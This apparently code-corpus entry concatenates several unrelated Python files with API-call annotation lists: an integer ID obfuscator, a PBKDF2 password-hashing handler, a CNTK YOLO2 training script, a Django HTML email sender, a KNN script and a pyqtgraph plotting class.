def encode(int_list, alphabet):
'''Encode ints using alphabet.'''
char_list = []
for i in int_list:
if i > len(alphabet) or i < 0:
raise ValueError
char_list.append(alphabet[i])
return ''.join(char_list)
def decode(s, alphabet):
'''Decode a string s using alphabet returning a list of ints.'''
try:
return [alphabet.index(c) for c in s]
except (TypeError, IndexError):
raise ValueError
def encrypt(int_list, key, base):
encrypted_ints = []
moving_value = 0
for char_index, key_value in zip(int_list, key_gen(key, base)):
encrypted_int = (char_index + key_value + moving_value) % base
encrypted_ints.append(encrypted_int)
moving_value += encrypted_int
return encrypted_ints
def decrypt(int_list, key, base):
decrypted_ints = []
moving_value = 0
for char_index, key_value in zip(int_list, key_gen(key, base)):
decrypted_int = (char_index - key_value - moving_value) % base
decrypted_ints.append(decrypted_int)
moving_value += char_index
return decrypted_ints
def obfuscate(num, key, alphabet, min_chars=0, num_check_chars=1):
''' Obfuscate num using key.
This does some minor encryption by adding values to a key and a moving value.
The moving value is so that one small change makes all of the resulting
characters change.
Args:
num: The integer to obfuscate
key: An int, string or bytes to generate key values (anything that can be passed to random.seed)
alphabet: A list of characters to use for the alphabet
min_chars: A minimum number of chars for the resulting string
num_check_chars: The number of chars to use as a check
Returns:
A string encoding the number in the passed alphabet and encrypted with key.
Raises:
ValueError: if num is not a number or < 0
'''
try:
if num < 0:
raise ValueError()
except TypeError:
raise ValueError()
base = len(alphabet)
num_as_ints = encode_base_n(num, base, min_chars)
unencrypted_digits = add_check_digits(num_as_ints, base, num_check_chars)
encrypted_digits = encrypt(unencrypted_digits, key, base)
return encode(encrypted_digits, alphabet)
def deobfuscate(s, key, alphabet, num_check_chars=1):
'''Deobfuscate a string using key and alphabet.
key, alphabet and num_check_chars must be identical to the values used to obfuscate.
Args:
s: The string to deobfuscate
key: The key used to obfuscate
alphabet: The alphabet used to obfuscate
num_check_chars: The number of chars to use as a check
Returns:
The deobfuscated integer.
Raises:
ValueError: if s isn't a string, s doesn't use alphabet or the checksum doesn't match
'''
base = len(alphabet)
encrypted_ints = decode(s, alphabet)
decrypted_ints = decrypt(encrypted_ints, key, base)
num_as_ints = eval_check_digits(decrypted_ints, base, num_check_chars)
return decode_base_n(num_as_ints, base)
class Obfuscator():
def __init__(self, key, alphabet=None, min_length=0, num_check_chars=1, version=1):
'''
This accepts a version number in case the algorithm changes at some point
in the future.
Args:
key: The key.
alphabet: Optionally, specify an alternative alphabet to use.
min_length: An encoded value will always be at least min_length
characters (including the check characters)
num_check_chars: The number of chars used for the check
version: The version of the algorithm to use.
'''
if isinstance(num_check_chars, int) and num_check_chars >= 0:
self.num_check_chars = num_check_chars
else:
raise ValueError('num_check_chars must be an int >= 0')
if isinstance(min_length, int) and min_length >= 0:
self.min_length = min_length - num_check_chars
else:
raise ValueError('min_length must be an int >= 0')
self.key = key
alphabet = list(alphabet or ALPHANUM)
shuffle(key, alphabet)
self.alphabet = setlist(alphabet)
def obfuscate(self, num, salt=None, min_length=None):
if salt:
key = self.key + salt
else:
key = self.key
if min_length is None:
min_length = self.min_length
return obfuscate(num, key, self.alphabet, min_length, self.num_check_chars)
def deobfuscate(self, s, salt=None):
if salt:
key = self.key + salt
else:
key = self.key
return deobfuscate(s, key, self.alphabet, self.num_check_chars)
| [
"random.Random",
"collections_extended.setlist"
] | [((336, 347), 'random.Random', 'Random', (['key'], {}), '(key)\n', (342, 347), False, 'from random import Random\n'), ((711, 722), 'random.Random', 'Random', (['key'], {}), '(key)\n', (717, 722), False, 'from random import Random\n'), ((6443, 6460), 'collections_extended.setlist', 'setlist', (['alphabet'], {}), '(alphabet)\n', (6450, 6460), False, 'from collections_extended import setlist\n')] |
# -*- coding: utf-8 -*-
"""
pbkdf2 hashing handler module.
"""
import hashlib
import re
import pyrin.configuration.services as config_services
import pyrin.security.utils.services as security_utils_services
from pyrin.security.hashing.decorators import hashing
from pyrin.security.hashing.handlers.base import HashingBase
from pyrin.security.hashing.handlers.exceptions import InvalidHashingRoundsCountError, \
InvalidPBKDF2InternalAlgorithmError, InvalidHashingSaltLengthError
@hashing()
class PBKDF2Hashing(HashingBase):
"""
pbkdf2 hashing class.
"""
# regular expression to validate format of full hashed values.
# the following format will be matched:
# `$handler_name$internal_algorithm$rounds$salt_length$salt-text_plus_salt_hash`
FORMAT_REGEX = re.compile(r'^\$PBKDF2\$[^$]+\$[\d]+\$[\d]+\$(.+)$')
def __init__(self, **options):
"""
initializes an instance of PBKDF2Hashing.
"""
super().__init__(**options)
def _generate_hash(self, text, **options):
"""
gets the hash of input text using a random or specified salt.
:param str text: text to be hashed.
:keyword bytes salt: salt to be used for hashing.
if not provided, a random salt will be generated
considering `salt_length` option.
:keyword str internal_algorithm: internal algorithm to be used
for hashing. if not provided,
default value from relevant
config will be used.
:keyword int rounds: rounds to perform for generating hash.
if not provided, default value from
relevant config will be used.
:keyword int salt_length: salt length to be used for hashing.
if `salt` option is provided, then
this value will be ignored.
if not provided, default value from
relevant config will be used.
:rtype: bytes
"""
internal_algorithm, rounds, salt_length = self._extract_attributes(**options)
self._validate_attributes(internal_algorithm, rounds, salt_length)
salt = options.get('salt', None)
if salt is None:
salt = self._generate_salt(length=salt_length)
text_hash = hashlib.pbkdf2_hmac(internal_algorithm,
text.encode(self._encoding),
salt,
rounds)
return self._make_final_hash(internal_algorithm, rounds, salt, text_hash)
def _generate_salt(self, **options):
"""
generates a valid salt for this handler and returns it.
:keyword int length: length of generated salt in bytes.
if not provided, default value from
relevant config will be used.
:rtype: bytes
"""
salt_length = options.get('length', config_services.get('security', 'hashing',
'pbkdf2_salt_length'))
return security_utils_services.get_bytes(length=salt_length)
def _is_match(self, text, hashed_value, **options):
"""
gets a value indicating that given text's
hash is identical to given hashed value.
:param str text: text to be hashed.
:param bytes hashed_value: hashed value to compare with.
:rtype: bool
"""
internal_algorithm, rounds, salt, text_hash = \
self._extract_parts_from_final_hash(hashed_value, **options)
new_full_hashed_value = self._generate_hash(text,
internal_algorithm=internal_algorithm,
rounds=rounds, salt=salt)
return hashed_value == new_full_hashed_value
def _get_algorithm(self, **options):
"""
gets the hashing algorithm.
:rtype: str
"""
return 'PBKDF2'
def _get_separator_count(self):
"""
gets the separator count used between parts of this handler's hashed result.
:rtype: int
"""
return 5
def _extract_attributes(self, **options):
"""
extracts the required attributes for this handler from input
keyword arguments. if not available, gets the default
values from relevant configs.
:keyword str internal_algorithm: internal algorithm to be used
for hashing. if not provided,
default value from relevant
config will be used.
:keyword int rounds: rounds to perform for generating hash.
if not provided, default value from
relevant config will be used.
:keyword int salt_length: salt length to be used for hashing.
if not provided, default value from
relevant config will be used.
:returns: tuple[str internal_algorithm, int rounds, int salt_length]
:rtype: tuple[str, int, int]
"""
internal_algorithm = options.get('internal_algorithm',
config_services.get('security', 'hashing',
'pbkdf2_internal_algorithm'))
rounds = options.get('rounds', config_services.get('security', 'hashing',
'pbkdf2_rounds'))
salt_length = options.get('salt_length', config_services.get('security', 'hashing',
'pbkdf2_salt_length'))
return internal_algorithm, rounds, salt_length
def _validate_attributes(self, internal_algorithm, rounds, salt_length):
"""
validates the given inputs for hash generation.
it will raise an error on invalid inputs.
:param str internal_algorithm: internal algorithm to be used for hashing.
:param int rounds: rounds to perform for generating hash.
:param int salt_length: salt length to be used for hashing.
:raises InvalidPBKDF2InternalAlgorithmError: invalid pbkdf2 internal algorithm error.
:raises InvalidHashingRoundsCountError: invalid hashing rounds count error.
:raises InvalidHashingSaltLengthError: invalid hashing salt length error.
"""
if internal_algorithm not in hashlib.algorithms_guaranteed:
raise InvalidPBKDF2InternalAlgorithmError('Internal algorithm [{algorithm}] '
'is invalid.'
.format(algorithm=internal_algorithm))
if rounds < 1:
raise InvalidHashingRoundsCountError('Hashing rounds [{rounds}] is invalid.'
.format(rounds=rounds))
if salt_length < 1:
raise InvalidHashingSaltLengthError('Salt length [{length}] is invalid.'
.format(length=salt_length))
def _make_final_hash(self, internal_algorithm, rounds, salt, text_hash):
"""
makes final hash from input values and returns it.
:param str internal_algorithm: internal algorithm to be used for hashing.
:param int rounds: rounds to perform for generating hash.
:param bytes salt: salt to be used for hashing.
:param bytes text_hash: hash value of text and salt.
:rtype: bytes
"""
return self._get_separator() + self._get_separator().join(
(self._get_algorithm().encode(self._encoding),
internal_algorithm.encode(self._encoding),
str(rounds).encode(self._encoding),
str(len(salt)).encode(self._encoding),
self._encode_hash_part(salt + text_hash)))
def _extract_parts_from_final_hash(self, full_hashed_value, **options):
"""
extracts different parts of given full hashed value.
:param bytes full_hashed_value: full hashed value to extract it's parts.
:returns: tuple[str internal_algorithm, int rounds, bytes salt, bytes text_hash]
:rtype: tuple[str, int, bytes, bytes]
"""
empty, handler, internal_algorithm, rounds, salt_length, salt_plus_text_hash = \
full_hashed_value.split(self._get_separator(), self._get_separator_count())
salt_length = int(salt_length)
raw_salt_plus_text_hash = self._decode_hash_part(salt_plus_text_hash)
salt = raw_salt_plus_text_hash[:salt_length]
text_hash = raw_salt_plus_text_hash[salt_length:]
return internal_algorithm.decode(self._encoding), int(rounds), salt, text_hash
def _get_hashed_part(self, full_hashed_value, **options):
"""
gets the hashed part from full hashed value which current handler understands it.
this handler returns the same input value as result.
:param bytes full_hashed_value: full hashed value to get hashed part from it.
:rtype: bytes
"""
return full_hashed_value
| [
"pyrin.configuration.services.get",
"pyrin.security.hashing.decorators.hashing",
"pyrin.security.utils.services.get_bytes",
"re.compile"
] | [((488, 497), 'pyrin.security.hashing.decorators.hashing', 'hashing', ([], {}), '()\n', (495, 497), False, 'from pyrin.security.hashing.decorators import hashing\n'), ((790, 848), 're.compile', 're.compile', (['"""^\\\\$PBKDF2\\\\$[^$]+\\\\$[\\\\d]+\\\\$[\\\\d]+\\\\$(.+)$"""'], {}), "('^\\\\$PBKDF2\\\\$[^$]+\\\\$[\\\\d]+\\\\$[\\\\d]+\\\\$(.+)$')\n", (800, 848), False, 'import re\n'), ((3331, 3384), 'pyrin.security.utils.services.get_bytes', 'security_utils_services.get_bytes', ([], {'length': 'salt_length'}), '(length=salt_length)\n', (3364, 3384), True, 'import pyrin.security.utils.services as security_utils_services\n'), ((3185, 3249), 'pyrin.configuration.services.get', 'config_services.get', (['"""security"""', '"""hashing"""', '"""pbkdf2_salt_length"""'], {}), "('security', 'hashing', 'pbkdf2_salt_length')\n", (3204, 3249), True, 'import pyrin.configuration.services as config_services\n'), ((5574, 5645), 'pyrin.configuration.services.get', 'config_services.get', (['"""security"""', '"""hashing"""', '"""pbkdf2_internal_algorithm"""'], {}), "('security', 'hashing', 'pbkdf2_internal_algorithm')\n", (5593, 5645), True, 'import pyrin.configuration.services as config_services\n'), ((5748, 5807), 'pyrin.configuration.services.get', 'config_services.get', (['"""security"""', '"""hashing"""', '"""pbkdf2_rounds"""'], {}), "('security', 'hashing', 'pbkdf2_rounds')\n", (5767, 5807), True, 'import pyrin.configuration.services as config_services\n'), ((5918, 5982), 'pyrin.configuration.services.get', 'config_services.get', (['"""security"""', '"""hashing"""', '"""pbkdf2_salt_length"""'], {}), "('security', 'hashing', 'pbkdf2_salt_length')\n", (5937, 5982), True, 'import pyrin.configuration.services as config_services\n')] |
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 28 13:03:05 2017
@author: <NAME>
"""
import cntk as C
import _cntk_py
import cntk.layers
import cntk.initializer
import cntk.losses
import cntk.metrics
import cntk.logging
import cntk.io.transforms as xforms
import cntk.io
import cntk.train
import os
import numpy as np
import yolo2
import CloneModel
# default Paths relative to current python file.
abs_path = os.path.dirname(os.path.abspath(__file__))
model_path = os.path.join(abs_path, "Models")
# model dimensions
image_height = 416
image_width = 416
num_channels = 3 # RGB
num_truth_boxes = 14
box_dim = 5 # centerX, centerY, Width, Height, class_type
num_classes = 3 # object type count. i.e. tomato, flower, stem, et, al.
num_anchors = 5
model_name = "Yolo2Net.model"
# Create a minibatch source.
def create_image_mb_source(image_file, rois_file, is_training, total_number_of_samples):
if not os.path.exists(image_file):
raise RuntimeError("File '%s' does not exist." %image_file)
if not os.path.exists(rois_file):
raise RuntimeError("File '%s' does not exist." %rois_file)
# transformation pipeline for the features has jitter/crop only when training
transforms = [xforms.scale(width=image_width, height=image_height,
channels=num_channels, interpolations='linear')]
if is_training:
transforms += [
xforms.color(brightness_radius=0.2, contrast_radius=0.2, saturation_radius=0.2)
]
# deserializer
imageReader = cntk.io.ImageDeserializer(image_file,
cntk.io.StreamDefs(
features=cntk.io.StreamDef(field='image', transforms=transforms),
ignored=cntk.io.StreamDef(field='label', shape=1)))
txtReader = cntk.io.CTFDeserializer(rois_file,
cntk.io.StreamDefs(
rois=cntk.io.StreamDef(field='rois',shape=num_truth_boxes*box_dim)))
return cntk.io.MinibatchSource([imageReader, txtReader],
randomize=is_training,
max_samples=total_number_of_samples,
multithreaded_deserializer=True)
# Create the network.
def create_yolo2net(anchor_dims = None):
# Input variables denoting the features and label data
feature_var = C.input_variable((num_channels, image_height, image_width))
label_var = C.input_variable((num_truth_boxes, box_dim))
net = CloneModel.CloneModel('Models/DarkNet.model', 'mean_removed_input', 'bn6e',
cntk.ops.functions.CloneMethod.clone, feature_var)
det1 = cntk.layers.layers.Convolution2D((3,3), 1024,
init=cntk.initializer.he_normal(), pad=True,
activation=cntk.ops.leaky_relu,
name='det1')(net)
detbn1 = cntk.layers.BatchNormalization(map_rank=1, name='detbn1')(det1)
det2 = cntk.layers.layers.Convolution2D((3,3), 1024,
init=cntk.initializer.he_normal(), pad=True,
activation=cntk.ops.leaky_relu,
name='det2')(detbn1)
detbn2 = cntk.layers.BatchNormalization(map_rank=1, name='detbn2')(det2)
det3 = cntk.layers.layers.Convolution2D((3,3), 1024,
init=cntk.initializer.he_normal(), pad = True,
activation=cntk.ops.leaky_relu,
name='det3')(detbn2)
detbn3 = cntk.layers.BatchNormalization(map_rank=1, name='detbn3')(det3)
z = cntk.layers.layers.Convolution2D((1,1), (5+num_classes) * num_anchors,
init=cntk.initializer.normal(0.01), pad = True,
name='output')(detbn3)
# loss and metric
ce = C.user_function(yolo2.Yolo2Error(z, label_var, class_size = num_classes, priors = anchor_dims))
pe = C.user_function(yolo2.Yolo2Metric(z, label_var, class_size = num_classes, priors = anchor_dims,
metricMethod = yolo2.Yolo2MetricMethod.Avg_iou))
cntk.logging.log_number_of_parameters(z) ; print()
return {
'feature': feature_var,
'label': label_var,
'ce' : ce,
'pe' : pe,
'output': z
}
# Create trainer
def create_trainer(network, epoch_size, num_quantization_bits, printer, block_size, warm_up):
# Set learning parameters
lr_per_mb = [0.001]*25 + [0.0001]*25 + [0.00001]*25 + [0.000001]*25 + [0.0000001]
lr_schedule = C.learning_rate_schedule(lr_per_mb, unit=C.learners.UnitType.minibatch, epoch_size=epoch_size)
mm_schedule = C.learners.momentum_schedule(0.9)
l2_reg_weight = 0.0005 # CNTK L2 regularization is per sample, thus same as Caffe
if block_size != None and num_quantization_bits != 32:
raise RuntimeError("Block momentum cannot be used with quantization, please remove quantized_bits option.")
# Create learner
local_learner = C.learners.momentum_sgd(network['output'].parameters, lr_schedule, mm_schedule, unit_gain=False, l2_regularization_weight=l2_reg_weight)
# Since we reuse parameter settings (learning rate, momentum) from Caffe, we set unit_gain to False to ensure consistency
# Create trainer
if block_size != None:
parameter_learner = cntk.train.distributed.block_momentum_distributed_learner(local_learner, block_size=block_size)
else:
parameter_learner = cntk.train.distributed.data_parallel_distributed_learner(local_learner, num_quantization_bits=num_quantization_bits, distributed_after=warm_up)
return C.Trainer(network['output'], (network['ce'], network['pe']), parameter_learner, printer)
# Train and test
def train_and_test(network, trainer, train_source, test_source, minibatch_size, epoch_size, restore):
# define mapping from intput streams to network inputs
input_map = {
network['feature']: train_source.streams.features,
network['label']: train_source.streams.rois
}
# Train all minibatches
cntk.train.training_session(
trainer=trainer, mb_source = train_source,
model_inputs_to_streams = input_map,
mb_size = minibatch_size,
progress_frequency=epoch_size,
checkpoint_config = C.CheckpointConfig(filename=os.path.join(model_path, model_name), restore=restore),
test_config= C.TestConfig(test_source, minibatch_size=minibatch_size)
).train()
# Train and evaluate the network.
def net_train_and_eval(train_data, train_rois, test_data, test_rois,
priors = None,
num_quantization_bits=32,
block_size=3200, warm_up=0,
minibatch_size=1,
epoch_size = 1281167,
max_epochs=1,
restore=True,
log_to_file=None,
num_mbs_per_log=None,
gen_heartbeat=True):
_cntk_py.set_computation_network_trace_level(0)
log_printer = cntk.logging.progress_print.ProgressPrinter(
freq=1,
tag='Training',
log_to_file = os.path.join(model_path, log_to_file),
num_epochs=max_epochs)
progress_printer = cntk.logging.progress_print.ProgressPrinter(freq=1, tag='Training',
num_epochs=max_epochs,test_freq=1)
network = create_yolo2net(priors)
trainer = create_trainer(network, epoch_size, num_quantization_bits,
[progress_printer, log_printer], block_size, warm_up)
train_source = create_image_mb_source(train_data, train_rois, True,
total_number_of_samples=max_epochs * epoch_size)
train_source
test_source = create_image_mb_source(test_data, train_rois, False,
total_number_of_samples=cntk.io.FULL_DATA_SWEEP)
train_and_test(network,
trainer,
train_source,
test_source,
minibatch_size,
epoch_size,
restore)
#
# get train sample size evaluate sample size
#
def get_sample_counts(train_file, test_file):
counts = [0, 0]
if os.path.exists(train_file):
ff = open(train_file)
counts[0] = len(ff.readlines())
ff.close()
if os.path.exists(test_file):
ff = open(test_file)
counts[1] = len(ff.readlines())
ff.close()
return counts
def open_anchor_file(anchor_file):
anchors = []
file = open(anchor_file)
lines = file.readlines()
for line in lines:
if len(line.strip()) > 0:
dims = line.strip().split("\t")
anchors.append([float(dims[0]), float(dims[1])])
file.close()
return np.array(anchors).astype(np.float32)
if __name__=='__main__':
anchor_data = 'anchor.txt'
if not os.path.exists(anchor_data):
raise RuntimeError("File '%s' does not exist." %anchor_data)
anchors = open_anchor_file(anchor_data)
if anchors.shape[0] < num_anchors:
raise RuntimeError("Anchor dimension is less than %s" %num_anchors)
# network = create_yolo2net(anchors)
# cntk.logging.graph.plot(network['output'], 'yolo2.png')
train_data = 'train.txt'
train_rois = 'train.rois.txt'
test_data = 'train.txt'
test_rois = 'train.rois.txt'
sample_size = get_sample_counts(train_data, test_data)
net_train_and_eval(train_data, train_rois, test_data, test_rois,
priors = anchors,
epoch_size=sample_size[0],
block_size = None,
minibatch_size = 32,
max_epochs = 130,
log_to_file = 'Yolo2Net.log')
# Must call MPI finalize when process exit without exceptions
cntk.train.distributed.Communicator.finalize()
| [
"os.path.exists",
"yolo2.Yolo2Metric",
"_cntk_py.set_computation_network_trace_level",
"cntk.Trainer",
"os.path.join",
"cntk.learners.momentum_sgd",
"yolo2.Yolo2Error",
"cntk.io.transforms.color",
"cntk.learners.momentum_schedule",
"cntk.input_variable",
"cntk.io.transforms.scale",
"numpy.arra... | [((469, 501), 'os.path.join', 'os.path.join', (['abs_path', '"""Models"""'], {}), "(abs_path, 'Models')\n", (481, 501), False, 'import os\n'), ((429, 454), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (444, 454), False, 'import os\n'), ((2267, 2326), 'cntk.input_variable', 'C.input_variable', (['(num_channels, image_height, image_width)'], {}), '((num_channels, image_height, image_width))\n', (2283, 2326), True, 'import cntk as C\n'), ((2343, 2387), 'cntk.input_variable', 'C.input_variable', (['(num_truth_boxes, box_dim)'], {}), '((num_truth_boxes, box_dim))\n', (2359, 2387), True, 'import cntk as C\n'), ((2399, 2529), 'CloneModel.CloneModel', 'CloneModel.CloneModel', (['"""Models/DarkNet.model"""', '"""mean_removed_input"""', '"""bn6e"""', 'cntk.ops.functions.CloneMethod.clone', 'feature_var'], {}), "('Models/DarkNet.model', 'mean_removed_input', 'bn6e',\n cntk.ops.functions.CloneMethod.clone, feature_var)\n", (2420, 2529), False, 'import CloneModel\n'), ((4334, 4432), 'cntk.learning_rate_schedule', 'C.learning_rate_schedule', (['lr_per_mb'], {'unit': 'C.learners.UnitType.minibatch', 'epoch_size': 'epoch_size'}), '(lr_per_mb, unit=C.learners.UnitType.minibatch,\n epoch_size=epoch_size)\n', (4358, 4432), True, 'import cntk as C\n'), ((4453, 4486), 'cntk.learners.momentum_schedule', 'C.learners.momentum_schedule', (['(0.9)'], {}), '(0.9)\n', (4481, 4486), True, 'import cntk as C\n'), ((4795, 4935), 'cntk.learners.momentum_sgd', 'C.learners.momentum_sgd', (["network['output'].parameters", 'lr_schedule', 'mm_schedule'], {'unit_gain': '(False)', 'l2_regularization_weight': 'l2_reg_weight'}), "(network['output'].parameters, lr_schedule,\n mm_schedule, unit_gain=False, l2_regularization_weight=l2_reg_weight)\n", (4818, 4935), True, 'import cntk as C\n'), ((5425, 5517), 'cntk.Trainer', 'C.Trainer', (["network['output']", "(network['ce'], network['pe'])", 'parameter_learner', 'printer'], {}), "(network['output'], (network['ce'], network['pe']),\n parameter_learner, printer)\n", (5434, 5517), True, 'import cntk as C\n'), ((6851, 6898), '_cntk_py.set_computation_network_trace_level', '_cntk_py.set_computation_network_trace_level', (['(0)'], {}), '(0)\n', (6895, 6898), False, 'import _cntk_py\n'), ((8143, 8169), 'os.path.exists', 'os.path.exists', (['train_file'], {}), '(train_file)\n', (8157, 8169), False, 'import os\n'), ((8267, 8292), 'os.path.exists', 'os.path.exists', (['test_file'], {}), '(test_file)\n', (8281, 8292), False, 'import os\n'), ((937, 963), 'os.path.exists', 'os.path.exists', (['image_file'], {}), '(image_file)\n', (951, 963), False, 'import os\n'), ((1044, 1069), 'os.path.exists', 'os.path.exists', (['rois_file'], {}), '(rois_file)\n', (1058, 1069), False, 'import os\n'), ((1239, 1343), 'cntk.io.transforms.scale', 'xforms.scale', ([], {'width': 'image_width', 'height': 'image_height', 'channels': 'num_channels', 'interpolations': '"""linear"""'}), "(width=image_width, height=image_height, channels=num_channels,\n interpolations='linear')\n", (1251, 1343), True, 'import cntk.io.transforms as xforms\n'), ((3614, 3688), 'yolo2.Yolo2Error', 'yolo2.Yolo2Error', (['z', 'label_var'], {'class_size': 'num_classes', 'priors': 'anchor_dims'}), '(z, label_var, class_size=num_classes, priors=anchor_dims)\n', (3630, 3688), False, 'import yolo2\n'), ((3719, 3844), 'yolo2.Yolo2Metric', 'yolo2.Yolo2Metric', (['z', 'label_var'], {'class_size': 'num_classes', 'priors': 'anchor_dims', 'metricMethod': 'yolo2.Yolo2MetricMethod.Avg_iou'}), '(z, label_var, class_size=num_classes, priors=anchor_dims,\n metricMethod=yolo2.Yolo2MetricMethod.Avg_iou)\n', (3736, 3844), False, 'import yolo2\n'), ((8811, 8838), 'os.path.exists', 'os.path.exists', (['anchor_data'], {}), '(anchor_data)\n', (8825, 8838), False, 'import os\n'), ((1433, 1512), 'cntk.io.transforms.color', 'xforms.color', ([], {'brightness_radius': '(0.2)', 'contrast_radius': '(0.2)', 'saturation_radius': '(0.2)'}), '(brightness_radius=0.2, contrast_radius=0.2, saturation_radius=0.2)\n', (1445, 1512), True, 'import cntk.io.transforms as xforms\n'), ((7025, 7062), 'os.path.join', 'os.path.join', (['model_path', 'log_to_file'], {}), '(model_path, log_to_file)\n', (7037, 7062), False, 'import os\n'), ((8701, 8718), 'numpy.array', 'np.array', (['anchors'], {}), '(anchors)\n', (8709, 8718), True, 'import numpy as np\n'), ((6197, 6253), 'cntk.TestConfig', 'C.TestConfig', (['test_source'], {'minibatch_size': 'minibatch_size'}), '(test_source, minibatch_size=minibatch_size)\n', (6209, 6253), True, 'import cntk as C\n'), ((6120, 6156), 'os.path.join', 'os.path.join', (['model_path', 'model_name'], {}), '(model_path, model_name)\n', (6132, 6156), False, 'import os\n')] |
from django.core.mail import EmailMessage
from django.conf import settings
def send_email(name, date, email):
txt = """
<html>
<body>
<table cellpadding='0' cellspacing='0' width='100%' border='0'>
<tbody>
<tr>
<td style='word-wrap:break-word;font-size:0px;padding:0px;padding-bottom:10px' align='left'>
<div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:20px;line-height:22px;letter-spacing:-0.8px;text-align:left'>
안녕하세요 <span style='color:#3832D8'>{0}</span> 님,
</div>
</td>
</tr>
<tr>
<td style='word-wrap:break-word;font-size:0px;padding:0px;padding-bottom:10px' align='left'>
<div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:30px;line-height:1.3;letter-spacing:-1.1px; text-align:left'>
OpenInfra Days Korea 2018
</div>
</td>
</tr>
<tr>
<td style='word-wrap:break-word;font-size:0px;padding:0px;padding-bottom:30px' align='left'>
<div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:20px;line-height:22px;letter-spacing:-0.8px;text-align:left'>
초청 티켓 등록이 완료되었습니다.
</div>
</td>
</tr>
<tr>
<td style='word-wrap:break-word;font-size:0px;padding:0px;padding-bottom:30px' align='left'>
<div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:20px;line-height:22px;letter-spacing:-0.8px;text-align:left'>
참가 일자 : {1}
</div>
</td>
</tr>
<tr>
<td style='word-wrap:break-word;font-size:0px;padding:0px' align='left'>
<div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:20px;line-height:22px;letter-spacing:-0.8px;text-align:left'>
<a href="http://invite.openinfradays.kr">티켓 확인</a>
</div>
</td>
</tr>
</tbody>
</table>
</body>
</html>
""".format(name, date)
email = EmailMessage(settings.EMAIL_TITLE, txt, to=(email,))
email.content_subtype = "html"
return email.send()
| [
"django.core.mail.EmailMessage"
] | [((2019, 2071), 'django.core.mail.EmailMessage', 'EmailMessage', (['settings.EMAIL_TITLE', 'txt'], {'to': '(email,)'}), '(settings.EMAIL_TITLE, txt, to=(email,))\n', (2031, 2071), False, 'from django.core.mail import EmailMessage\n')] |
import KNN as K
K.clearScreen()
dataTraining= K.loadData("dataTraining.txt")
X=dataTraining[:,0:3]
initial_centroids=K.listToArray([[3, 3,3],[6, 2,4],[8,5,7]])
idx=K.KMean_Run(X,initial_centroids,5)
K.SaveData(K.concatenateVectors(X,idx))
K.plotKNN2(X,idx)
| [
"KNN.concatenateVectors",
"KNN.plotKNN2",
"KNN.listToArray",
"KNN.loadData",
"KNN.KMean_Run",
"KNN.clearScreen"
] | [((20, 35), 'KNN.clearScreen', 'K.clearScreen', ([], {}), '()\n', (33, 35), True, 'import KNN as K\n'), ((50, 80), 'KNN.loadData', 'K.loadData', (['"""dataTraining.txt"""'], {}), "('dataTraining.txt')\n", (60, 80), True, 'import KNN as K\n'), ((124, 172), 'KNN.listToArray', 'K.listToArray', (['[[3, 3, 3], [6, 2, 4], [8, 5, 7]]'], {}), '([[3, 3, 3], [6, 2, 4], [8, 5, 7]])\n', (137, 172), True, 'import KNN as K\n'), ((172, 208), 'KNN.KMean_Run', 'K.KMean_Run', (['X', 'initial_centroids', '(5)'], {}), '(X, initial_centroids, 5)\n', (183, 208), True, 'import KNN as K\n'), ((248, 266), 'KNN.plotKNN2', 'K.plotKNN2', (['X', 'idx'], {}), '(X, idx)\n', (258, 266), True, 'import KNN as K\n'), ((218, 246), 'KNN.concatenateVectors', 'K.concatenateVectors', (['X', 'idx'], {}), '(X, idx)\n', (238, 246), True, 'import KNN as K\n')] |
#!/usr/bin/env python
import pyqtgraph as pg
from pyqtgraph import ViewBox
from hummingbird.graphics.plotter_args import PlotBoxArgs
from hummingbird.graphics.state_plot import StatePlot
class StatePlotBox:
def __init__(self, window, args):
""" Create a new plotbox wrapper object
Arguments:
window (pg.GraphicsWindow): pyqtgraph window object in which to
place this plotbox
args (PlotboxArgs object): PlotboxArgs object which holds all the
appropriate arguments for the plotbox
"""
if not isinstance(args, PlotBoxArgs):
raise TypeError('\'args\' argument must be of type PlotboxArgs')
# Initlialize plotbox
if args.labels is not None:
self.plotbox = window.addPlot(title=args.title, labels=args.labels)
else:
self.plotbox = window.addPlot(labels={'left': args.title})
# Handle dimension parameters
self.dimension = len(args.plots[0].state_names)
if self.dimension == 1:
self.plotbox.setAutoVisible(y=True)
else:
self.plotbox.setAutoVisible(x=True, y=True)
self.plotbox.setAspectLocked() # Lock x/y ratio to be 1
# Handle color parameters
self.set_axis_color(args.axis_color, args.axis_width)
self.distinct_plot_hues = args.plot_hues
self.plot_min_hue = args.plot_min_hue
self.plot_max_hue = args.plot_max_hue
self.plot_min_value = args.plot_min_value
self.plot_max_value = args.plot_max_value
if args.legend:
self.add_legend()
# Plots related to this plotbox
self.plots = {}
for p in args.plots:
self.add_plot(p)
# Other args
self.time_window = args.time_window
def label_axes(self, x_label=None, y_label=None):
if x_label is not None:
self.plotbox.setLabel('bottom', x_label)
if y_label is not None:
self.plotbox.setLabel('left', y_label)
def set_axis_color(self, color, width=1):
self.axis_pen = pg.mkPen(color=color, width=width)
self.plotbox.getAxis("left").setPen(self.axis_pen)
self.plotbox.getAxis("bottom").setPen(self.axis_pen)
def add_legend(self):
self.plotbox.addLegend(size=(1, 1), offset=(1, 1))
def add_plot(self, plot_args):
if plot_args.color is None:
plot_args.set_color(self._get_color(len(self.plots)))
self.plots[plot_args.name] = StatePlot(self.plotbox, plot_args)
def get_states(self):
states = {}
for p in self.plots.values():
states.update(p.get_states())
return states
def get_xrange(self):
return self.plotbox.vb.targetRange()[0]
def get_yrange(self):
return self.plotbox.vb.targetRange()[1]
def update(self, t):
""" Update the plot data and adjust viewing range
Arguments:
t (float): the current time in seconds. Used to adjust the rolling
time window appropriately
"""
for p in self.plots.values():
p.update()
if self.dimension == 1:
x_min = max(t - self.time_window, 0)
x_max = t
self.plotbox.setXRange(x_min, x_max)
self.plotbox.enableAutoRange(axis=ViewBox.YAxis)
else:
self.plotbox.enableAutoRange(axis=ViewBox.XYAxes)
# TODO: Add 3D support here
def _get_color(self, index):
""" Returns incremental plot colors based on index """
return pg.intColor(index, minValue=self.plot_min_value, maxValue=self.plot_max_value,
hues=self.distinct_plot_hues, minHue=self.plot_min_hue, maxHue=self.plot_max_hue)
| [
